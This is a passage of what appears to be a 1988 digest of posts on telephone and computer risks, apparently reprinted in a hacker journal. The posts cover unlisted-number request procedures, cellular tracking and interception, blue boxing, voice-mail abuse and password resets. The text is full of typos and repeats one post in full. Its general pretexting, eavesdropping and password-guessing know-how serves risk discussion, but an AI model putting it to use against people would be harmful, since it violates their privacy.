precautions kick into place. Only a tiny percentage of telephone company
|
||
employees are deemed to have a 'need to know' in the first place; among
|
||
these would be the GCO's (Grup Chef Operators), certain management people
|
||
in the central offices, certain people in the Treasury/Accounting office,
|
||
andof course, security representatives both from Illinois Bell and the
|
||
various long distance carriers, such as AT&T/Sprint/MCI.
|
||
|
||
Let us have a hypothetical example for our Correspondent: Your mother has taken
|
||
seriously ill, and is on her deathbed. Your brother is unable to reach you to
|
||
notify you of this because you have a non-pub number. When his request for the
|
||
number has been turned down by Directory Assistance, simply because they do not
|
||
have it, he asks to speak with a supervisor, and he explains the problem. He
|
||
provides his own name and telephone number, and the supervisor states he will
|
||
be called back at a later time. The supervisor does not question if in fact an
|
||
emergency exists, which is the only valid reason for breaking security. The
|
||
supervisor may, if they are doing their job correctly, ask the inquirer point
|
||
blank, "Are you stating there is an emergency situation?".
|
||
|
||
Please bear inmind tat the law in Illinois and in many other states says that
|
||
if a person claims that an emergency exists in order to influence the use (or
|
||
discontinuance of use) of the telephone when in fact there is no emergency is
|
||
guilty of a misdemeanor crime. You say yes this is an emergency and I need to
|
||
contact my brother/sister/etc right away. The supervisor will then talk to
|
||
his/her supervisor, who is generally of the rank of Chief Operator for that
|
||
particular facility.
|
||
|
||
The Chief Operator will call the NonPub people, will identify herself, and
|
||
*leave her own call back number*. The NonPub people will call back to verify
|
||
the origin of the call, and only then will there be information given out
|
||
regards your brother's telephone number. It helps if you know the *exact* way
|
||
the name appears in the records, and the *exact* address; if there is more than
|
||
one of that name with non-pub service, they may tell you they are unable to
|
||
figure out who it is you want.
|
||
|
||
The NonPub person will then call the subscriber with the nn-published number
|
||
and explain to tem what has occurred: So and so has contacted one of our
|
||
operators and asked for assistance in reaching you. The party states that it
|
||
is a family emergency which requires your immediate attention. Would it be
|
||
alright if we give him/her your number, *or would you prefer to call them back
|
||
yourself?
|
||
|
||
Based on the answer given, the number is either relayed back to the Chief
|
||
Operator, or a message is rlaedback saying the non-pub customer has been
|
||
notified. If the customer says it is okay to pass his number, then the Chief
|
||
Operator will call you back, ask who YOU are, rather than saying WHO she wants,
|
||
and satisfied with your identification will give you the number you are seeking
|
||
or will advise you that your brother has been given the message by someone from
|
||
our office, and has said he will contact you.
|
||
|
||
Before the NonPub people will even talk to you, your 'call back number' has to
|
||
be on their list of approved numbers for that purpose. A clerk n the Business
|
||
Office cannot imitate a Chief Operator for example, simply because NonPub would
|
||
say that the number you are asking us to call back to is not on our list. "Tell
|
||
your supervisor what it is you are seeking and have them call us..."
|
||
|
||
Other emergency type requests for non-pub numbers would be a big fire at some
|
||
business place in the middle of the night, and the owners of the company must
|
||
be notified at their home; or a child is found wandering by the police and
|
||
the child is too young to know his parent's (non-pub) number.
|
||
|
||
They will also handle non-emergency requests, but only if they are of some
|
||
importance and not frivolous in nature. You have just come to our city to visit
|
||
and are seeking a long lost friend who has a non-pub number; you are compiling
|
||
the invitations to your high school class fiftieth re-union and find a class
|
||
member is non-pub. Within certain reasonable limits, they will pass along your
|
||
request to the desired party and let them make the choice of whether to return
|
||
the call or not. But always, you leave your phone number with them, and in due
|
||
time someone will call yo back to report what has been said or done.
|
||
|
||
You would be surprised -- or maybe you wouldn't -- at the numerous scams and
|
||
[........] stories people tell the phone company to get the non-pub number of
|
||
someone else. Fortunately, Bell takes a great deal of pride in their efforts to
|
||
protect the privacy of their subscribers.
|
||
|
||
Patrick Townson, The Portal Syse(TM)
|
||
uunet!portal!cup.portal.com!Patrick_A_Townson
|
||
|
||
-----------------------
|
||
|
||
Date: Tue, 4 Oct 88 18:01:58 CDT
|
||
From: linnig@skvax1.csc.ti.com
|
||
Subject: More on monitoring Cellular Phones
|
||
|
||
Alan Kaminsky (ark%hoder@CS.RIT.EDU) writes:
|
||
|
||
> When a phone detects a paging message with
|
||
> its own address, it broadcasts a page response message. This response is
|
||
> received by all the cells in the system, and the signal strength is measured.
|
||
> The cell receiving the strongest response is assumed to be the cell in which
|
||
> the phone is located, an unused frequency in that cell is assigned, and the
|
||
> phone call is switched to a transceiver in that cell.
|
||
|
||
Ah, but could the phone company send out a page without a following
|
||
"ring them" message? If they could, then they could periodically
|
||
poll your position, and your faithful cellular phone would report
|
||
it without your knowledge.
|
||
|
||
> As for business competitors monitoring calls you place on your cellular
|
||
> telephone, to find out your clients' phone numbers: This is perfectly
|
||
> possible.... One hopes the FCC, police, etc.
|
||
> would prevent anyone from offering such a product commercially.
|
||
|
||
Well, the communication privacy act recently passed prevents you from
|
||
intercepting the audio side of the cellular phone conversation, but I doubt
|
||
if it prevents you from picking up the dialing info. I think such a device
|
||
might be considered in the same class as a "pen register." Pen registers
|
||
record the numbers called on a telephone circuit. I believe the Supreme
|
||
Court doesn't even require a search warrant to place a pen register on a
|
||
phone. It may be quite legal to record the phone numbers dialed by a
|
||
cellular phone. Someone with a law background want to comment?
|
||
|
||
Mike Linnig,
|
||
Texas Instruments
|
||
|
||
------------------------------
|
||
|
||
Date: Fri, 7 Oct 88 09:00:08 edt
|
||
From: Henry Cox <cox@spock.ee.mcgill.ca>
|
||
Subject: Reach Out and Touch Someone...
|
||
|
||
TEENS RUN UP TELEPHONE BILL OF $650,000
|
||
|
||
[From the Montreal Gazette, 7 October 1988]
|
||
|
||
LAS VEGAS (AP) - Ten teenage hackers may have run up $650 000 in
|
||
telephone calls by tricking phone company computers, and their parents
|
||
could be liable for the tab, authorities said.
|
||
|
||
"They reached out, all right," assistant U.S. Attorney Russel Mayer said
|
||
of the hackers, nine 14-year-olds and one 17-year-old. "They reached
|
||
out and touched the world."
|
||
|
||
Tom Spurlock, resident agent in charge of the Las Vegas Secret Service
|
||
office, said the teen agers engaged in "blue boxing," a technique that
|
||
enabled them to talk to fellow hackers throughout Europe.
|
||
|
||
"They were calling numbers that were in the ATT system, and their
|
||
(computer) programs would allow them to jump' ATT's circuits, allowing
|
||
them to call anywhere in the world."
|
||
|
||
The expensive shenanigans came to light when local phone company
|
||
officials discovered unusual activity on nine Las Vegas phone lines,
|
||
Spurlock said. He said federal agents obtained warrants and searched
|
||
the nine homes.
|
||
|
||
The teenagers weren't taken into custody or charged, but their computers
|
||
were seized.
|
||
|
||
Henry Cox
|
||
|
||
------------------------------
|
||
|
||
Date: Fri, 07 Oct 88 13:35:03 -0400
|
||
From: davis@community-chest.mitre.org
|
||
Subject: Computer Security and Voice Mail
|
||
|
||
>From the Oct 6 Washington Post.
|
||
>From a news item "Hackers Find New Way to Tap Long-Distance Phone Lines".
|
||
|
||
Zotos International Co. received two consecutive $75,000 phone bills,
|
||
due to use of their automated answering system by hackers.
|
||
|
||
Zotos' switchboard automatically routes incoming calls to the proper
|
||
department. Hackers found a way to circumvent the system to place outgoing
|
||
long-distance calls, in some cases to Pakistan and Senegal. In this case the
|
||
calls were traced to Pakistani businesses in New York. However, police
|
||
officials told Zotos that they must catch the hackers in the act in order to
|
||
prosecute. The telephone company informed Zotos' mangement to pay the bills,
|
||
and collect from the susspected hackers via the civil courts.
|
||
|
||
In the same article, a related Los Angeles case of misuse of an electronic
|
||
switchboard system by outsiders described 'capture' of 200 of a company's
|
||
password-secured voice mail accounts. Outsiders, in this cases a dope ring and
|
||
a prostitution ring, gained access by guessing the 4-digit passwords and
|
||
changing them. The hackers backed off only when 'Federal authorities' began
|
||
tracing calls.
|
||
|
||
The article quotes security experts as recommending systems including several
|
||
access codes. Also, major companies are adding software to detect changes in
|
||
calling patterns.
|
||
|
||
------------------------------
|
||
|
||
Date: 6 Oct 88 09:45
|
||
From: plouff%nac.DEC@decwrl.dec.com (Wes Plouff)
|
||
Subject: Re: Risks of Cellular Phones
|
||
|
||
Recent writers to RISKS, starting with Chuck Weinstock in issue 7.57, have
|
||
focused on the risk of vehicle location by cellular telephone systems. In my
|
||
opinion, they exaggerate this risk and underestimate another risk of mobile
|
||
phones, the complete lack of privacy in radio transmissions.
|
||
|
||
Roughly 10 years ago I designed vehicle location controller hardware and
|
||
firmware used in the Washington-Baltimore cellular demonstration system.
|
||
That system led directly to products sold at least through the first
|
||
waves of cellular system construction a few years ago.
|
||
|
||
Since cellular base stations have intentionally limited geographic
|
||
coverage, vehicle location is a requirement. This limitation is used to
|
||
conserve radio channels; one cell's frequencies can be re-used by others
|
||
far enough away in the same metropolitan area. The cell system must
|
||
determine which cell a mobile user is located in when he begins a call,
|
||
and when during a conversation a vehicle crosses from one cell into
|
||
another. Cells are set up perhaps 3 to 20 miles in diameter and range
|
||
from circular to very irregular shapes. Cellular phone systems are
|
||
designed with ample margins so that statistically very few calls will be
|
||
lost or have degraded voice quality.
|
||
|
||
Making this system work does not require anything so fancy as
|
||
triangulation. Vehicle location needs to be only good enough to keep
|
||
signal quality acceptably high. John Gilmore explained in RISKS 7.58
|
||
how this works while the mobile phone is on-hook. During a
|
||
conversation, the base station periodically measures the signal strength
|
||
of an active mobile in its cell. When the signal strength goes below a
|
||
threshold, adjacent cells measure the mobile's signal strength. This
|
||
'handoff trial' procedure requires no interaction with the mobile. If
|
||
the mobile was stronger by some margin in an adjacent cell, both the mobile
|
||
phone and the cellular exchange switch are ordered to switch to a channel and
|
||
corresponding phone line in the new cell. Since base stations commonly use
|
||
directional antennas to cover a full circle, mobiles could be reliably located
|
||
in one third of the cell area at best. Distance-measuring techniques advocated
|
||
by AT&T were not adopted because the added cost was too high for the modest
|
||
performance gain.
|
||
|
||
Certainly a cellular phone system can locate a mobile at any time, and always
|
||
locates a mobile during a conversation. But the information is not
|
||
fine-grained enough to implement some of the schemes imagined by previous
|
||
writers.
|
||
|
||
A more important risk is the risk of conversations being intercepted. The
|
||
public airwaves are simply that: public. Scanner radios can easily be found or
|
||
modified to cover the cellular band, and listeners will tolerate lower signal
|
||
quality than cellular providers, hence one scanner can listen to cell base
|
||
stations over a wide area. The communications privacy law is no shield because
|
||
listeners are undetectable. To bring this back to risks of computers,
|
||
automated monitoring and recording of selected mobile phones is probably beyond
|
||
the reach of the average computer hobbyist, but easily feasible for a
|
||
commercial or government organization using no part of the infrastructure
|
||
whatever, just the control messages available on the air.
|
||
|
||
Wes Plouff, Digital Equipment Corp, Littleton, Mass.
|
||
plouff%nac.dec@decwrl.dec.com
|
||
|
||
------------------------------
|
||
|
||
Date: Wed, 12 Oct 88 20:34:01 -0700
|
||
From: davy@riacs.edu <David A. Curry>
|
||
Subject: 100 digit primes no longer safe in crypto
|
||
|
||
Taken from the San Jose Mercury News, Oct. 12, 1988, Page 8A:
|
||
|
||
Computers able to make light work of cracking code (Los Angeles Times)
|
||
|
||
Some secret codes intended to restrict access to military secrets and Swiss
|
||
bank accounts may not be as safe as had been presumed, a team of computer
|
||
experts demonstrated Tuesday.
|
||
The team succeeded in doing what security experts thought could not be done:
|
||
using ordinary computers to break down a 100-digit number into the components
|
||
that produce it when multiplied together.
|
||
That process, called factoring, holds the key to many security codes.
|
||
Before Tuesday, experts had believed that if the number was large enough -
|
||
up to 100 digits - its factoring would take about 10 months with a Cray super-
|
||
computer, one of the most powerful computers in the world.
|
||
But computer experts across the United States, Europe and Australia solved
|
||
the problem more quickly by using 400 processors simultaneously. They linked
|
||
their computers electronically and factored a 100-digit number in just 26 days.
|
||
The number has two factors, one 41 digits long and the other 60 digits long.
|
||
And that, according to Arjen Lenstra, professor of computer science at the
|
||
University of Chicago, should be quite sobering to experts who believe they
|
||
are secure with codes based on numbers that large. Lenstra headed the project,
|
||
along with Mark S. Manasse of the Digital Equipment Corp.'s Systems Research
|
||
Center in Palo Alto.
|
||
|
||
[ quotes from experts ]
|
||
|
||
Rodney M. Goodman, associate professor of electrical engineering and an
|
||
expert on cryptography at the California Institute of Technology in Pasadena,
|
||
described the achievement as "significant," because it means that some systems
|
||
may not be as secure as had been thought. But he said it did not mean that
|
||
security experts around the world would have to rebuild their systems.
|
||
"All the cryptographers will do is increase the length of the number by a
|
||
few more digits," he said, "because the problem gets exponentially worse as
|
||
you increase the size of the number." A larger number is more cumbersome, and
|
||
cryptographers had tried to kep the number as small as possible.
|
||
|
||
[ explanation of the idea behind using large numbers with
|
||
prime factors in cryptography ]
|
||
|
||
Last year, Lenstra decided to tackle the problem on "a small scale, just to
|
||
see if he could do it," according to Larry Arbeiter, spokesman for the Univ-
|
||
ersity of Chicago. "It was a pure science type of effort."
|
||
Several months ago, Lenstra presented his idea to Manasse, a computer re-
|
||
search scientist with Digital. Manasse became so intrigued with the problem
|
||
that his company agreed to fund much of the cost, including the use of more
|
||
than 300 computer processors at the Palo Alto company during off-duty hours.
|
||
The company manufactures DEC computers.
|
||
"I was interested in the general problem of taking a program and breaking it
|
||
up into small pieces" so that many could work simultaneously toward the sol-
|
||
ution, Manasse said.
|
||
Other computer enthusiasts from the "factoring community" clamored aboard
|
||
and this fall more than 400 computers around the globe were ready to give it a
|
||
try.
|
||
The computers ranged in size from microcomputers to a Cray supercomputer,
|
||
but even personal computers with large memories could have been used, Lenstra
|
||
said. Each of the participating computers was given a different part of the
|
||
problem to solve, and success came early Tuesday morning.
|
||
|
||
------------------------------
|
||
|
||
Date: 12 Oct 88 19:14:22 GMT
|
||
From: spaf@purdue.edu (Gene Spafford)
|
||
Subject: NSFnet Backbone Shot
|
||
|
||
The following mail was forwarded to me a few minutes ago. This refers to
|
||
the MCI fiber used to carry the NSFnet backbone. No wonder some of my mail
|
||
has disappeared recently! [From: field inadvertently deleted?]
|
||
|
||
=> Date: Wed, 12 Oct 88 12:47:00 EDT
|
||
=> To: watchdogs@um.cc.umich.edu, ie@merit.edu
|
||
=> Subject: A bit of trivia
|
||
=>
|
||
=> The fiber that goes from Houston to Pittsburgh was broken due
|
||
=> to a gun blast....that is right, a gun blast.
|
||
=> Somewhere in the swamps of the Bayou (between Alabama and New Orleans)
|
||
=> the fiber cables are suspended above the swamps and a good ol'
|
||
=> boy was apparently target practicing on the cable.
|
||
=>
|
||
=> Traffic has been rerouted and when the investigation has taken place
|
||
=> and the cable fixed we will be put back on the original circuit.
|
||
|
||
Gene Spafford
|
||
NSF/Purdue/U of Florida Software Engineering Research Center,
|
||
Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004
|
||
Internet: spaf@cs.purdue.edu uucp: ...!$decwrl,gatech,ucbvax!purdue!spaf
|
||
|
||
------------------------------
|
||
|
||
Date: Tue, 11 Oct 88 00:14 MDT
|
||
From: MCCLELLAND_G%CUBLDR@VAXF.COLORADO.EDU
|
||
Subject: Intersection of ANI and Voice Mail Risks
|
||
|
||
Recent reports in RISKS of nefarious deeds committed by hackers who
|
||
entered a system via voice mail prompted me to inquire about the voice mail
|
||
security of my university's system. A year ago the U bought its own fancy
|
||
switch for on-campus communications. Some of the goodies include voice
|
||
mail and ANI. I tried the voice mail once but since I much prefer e-mail
|
||
I long ago forgot my voice mail password (yep, only 4 digits if the
|
||
hackers want to start guessing). I called the telecommunications office
|
||
to determine where I needed to go in person and with how many photo ID's
|
||
to get my voice mail password. Even though I hadn't identified myself,
|
||
the clerk said, "Oh that won't be necessary, Mr. McClelland, I'll just
|
||
change your password back to the default password and you can then change
|
||
it to whatever you want." I said, "But how do you know that I'm
|
||
McClelland?" He replies, "Because it shows on the digital display on my
|
||
phone both the phone number and name of the caller." [Most phones are in
|
||
private offices so a unique name can be attached to each number.] I tried
|
||
to explain that all he really knew was that I was someone calling from the
|
||
phone in McClelland's office and that I could be the janitor, a grad
|
||
student, or almost anyone. But security wasn't his problem so he wasn't
|
||
very concerned. I was afraid to ask how many folks never bother to change
|
||
their default password. As I was about to hang up, he said, "By the way, if
|
||
you check your voice mail from your own extension you don't even need to enter
|
||
your password." I said , "Thanks, that's reassuring" but I don't think he
|
||
caught the sarcasm.
|
||
Gary McClelland
|
||
|
||
------------------------------
|
||
|
||
Date: 6 Oct 88 09:45
|
||
From: plouff%nac.DEC@decwrl.dec.com (Wes Plouff)
|
||
Subject: Re: Risks of Cellular Phones
|
||
|
||
Recent writers to RISKS, starting with Chuck Weinstock in issue 7.57, have
|
||
focused onthe risk of vehicle location by cellular telephone systems. In my
|
||
opinion, they exaggerate this risk and underestimate another risk of mobile
|
||
phones, the complete lack of privacy in radio transmissions.
|
||
|
||
Roughly 10 years ago I designed vehicle location controller hardware and
|
||
firmware used in the Washington-Baltimore cellular demonstration system.
|
||
That system led directly to products sold at least through the first
|
||
waves of cellular system construction a few years ago.
|
||
|
||
Since cellular base stations have intentionally limited geographic coverage,
|
||
vehicle location is a requirement. This limitation is used to conserve radio
|
||
channels; one cell's frequencies can be re-used by others far enough away in
|
||
the same metropolitan area. The cell system must determine which cell a mobile
|
||
user is located in when he begins a call, and when during a conversation a
|
||
vehicle crosses from one cell into another. Cells are set up perhaps 3 to 20
|
||
miles in diameter and range from circular to very irregular shapes. Cellular
|
||
phone systems are designed with ample margins so that statistically very few
|
||
calls will be lost or have degraded voice quality.
|
||
|
||
Making this system work does not require anything so fancy as
|
||
triangulation. Vehicle location needs to be only good enough to keep
|
||
signal quality acceptably high. John Gilmore explained in RISKS 7.58
|
||
how this works while the mobile phone is on-hook. During a
|
||
conversation, the base station periodically measures the signal strength
|
||
of an active mobile in its cell. When the signal strength goes below a
|
||
threshold, adjacent cells measure the mobile's signal strength. This
|
||
'handoff trial' procedure requires no interaction with the mobile. If
|
||
the mobile was stronger by some margin in an adjacent cell, both the mobile
|
||
phone and the cellular exchange switch are ordered to switch to a channel and
|
||
corresponding phone line in e new cell. Since base stations commonly use
|
||
directional antennas to cover a full circle, mobiles could be reliably located
|
||
in one third of the cell area at best. Distance-measuring techniques advocated
|
||
by AT&T were not adopted because the added cost was too high for the modest
|
||
performance gain.
|
||
|
||
Certainly a cellular phone system can locate a mobile at any time, and always
|
||
locates a mobile during a conversation. But the information is not
|
||
fine-grained enough to implement some of the schemes imagined by previous
|
||
writers.
|
||
|
||
A more important risk is the risk of conversations being intercepted. The
|
||
public airwaves are simply that: public. Scanner radios can easily be found or
|
||
modified to cover the cellular band, and listeners will tolerate lower signal
|
||
quality than cellular providers, hence one scanner can listen to cell base
|
||
stations over a wide area. The communications privacy law is no shield because
|
||
listeners are undetectable. To bring this back to risks of computers,
|
||
automated monitoring and recording of selected bile phones is probably beyond
|
||
the reach of the average computer hobbyist, but easily feasible for a
|
||
commercial or government organization using no part of the infrastructure
|
||
whatever, just the control messages available on the air.
|
||
|
||
Wes Plouff, Digital Equipment Corp, Littleton, Mass.
|
||
plouff%nac.dec@decwrl.dec.com
|
||
|
||
------------------------------
|
||
|
||
Date: 28 Sep 88 10:10:47 +0100 (Wednesday)
|
||
From: Peter Robinson <pr@computer-lab.cambridge.ac.uk@NSS.Cs.Ucl.AC.UK>
|
||
Subject: Re: Risks of cellular telephones
|
||
|
||
As a radio amateur, I have always been taught that using mobile transmitters
|
||
near petrol stations is bad form - the radiation from the transmitter can
|
||
induce currents in nearby metalwork and perhaps cause a spark. The thought of
|
||
a cellular telephone being able to transmit without the operator's consent (in
|
||
response to a paging call) is, therefore, slightly RISKy.
|
||
|
||
Tis cold even get worse as technology progesses. As the sunspot cycle
|
||
advances, it sees plausible that transmissions will carry further and
|
||
interfere with those in nearby cells (not the adjacent ones, they usually have
|
||
distinct frequencies). Before long the manufacturers will introduce adaptive
|
||
control where the transmitter power is adjusted dynamically to compensate for
|
||
variations in the signal path between the mobile and base stations. So then
|
||
when you pull into a petrol station and receive a call, the system will notice
|
||
that all the surrounding metal is impairing your signal and will increase the
|
||
transmitter power accordingly...
|
||
|
||
Incidentally, I am not sure what power these radios use, but I would be
|
||
slightly nervous about using a hand-held telephone with the antenna anywhere
|
||
near my eyes if it is more than a few Watts.
|
||
|
||
------------------------------
|
||
|
||
Date: Sat, 8 Oct 88 15:59:56 MET
|
||
From: "Walter Doerr" <wd@dg2kk.UUCP>
|
||
Subject: Risks of cellulr phnes
|
||
|
||
Chuck Weistock <weinstoc@SEI.CMU.EDU> writes in RISKS 7.57:
|
||
|
||
> Subjec: Rsks of Cellular Phones?
|
||
>
|
||
> While discussing radio triangulation last nigh, the question came up:
|
||
> If I dial a phone number attached to a cellular phone, how does the
|
||
> cellular system know which cell should send the ring signal to the
|
||
> phone? Is it a system wide broadcast, or does the cellular phone
|
||
> periodically broadcast a "here I am" signal?
|
||
|
||
In the 'C-Net' here in Germany, all mobile phones send a "here I am" signal
|
||
whenever they move to a new cell. This information (the cell where the phone
|
||
can be reached) is stored in the database of the phone's "home" base. Calls to
|
||
mobile phones are routed to a computer in Frankfurt which contacts the home
|
||
base computer (based on the first few digits of the mobile phonenumber), which,
|
||
in turn, knows the cell the phone is currently in.
|
||
|
||
> If the latter, a less than benevolent government (or phone company for
|
||
> that matter) could use that information to track its citizens' cars'
|
||
> whereabouts.
|
||
|
||
According to an article in an electronics magazine, the German PTT was
|
||
approached by a police agency, who expressed interest in the data stored in the
|
||
networks computers. The article quotes a Siemens mobile telephone specialist
|
||
as saying that it isn't possible topipoint the current location of a mobile
|
||
phone because:
|
||
|
||
- the phone must be switched on for the network to recognize it
|
||
- the cells use omnidirectional antennas, so it isn't possible
|
||
to determine the direction from where the mobile phone's signal came.
|
||
|
||
While this is true, it is certainly possible to determine the location of a
|
||
phone with an accuracy of a few miles (the size of the cell the phone is in)
|
||
without using any additional direction finding methods (radio triangulation).
|
||
|
||
Walter Doerr
|
||
|
||
-------------------------------------------------------------------------------
|
||
End of the LOD/H Technical Journal #3
|
||
-------------------------------------------------------------------------------
|
||
|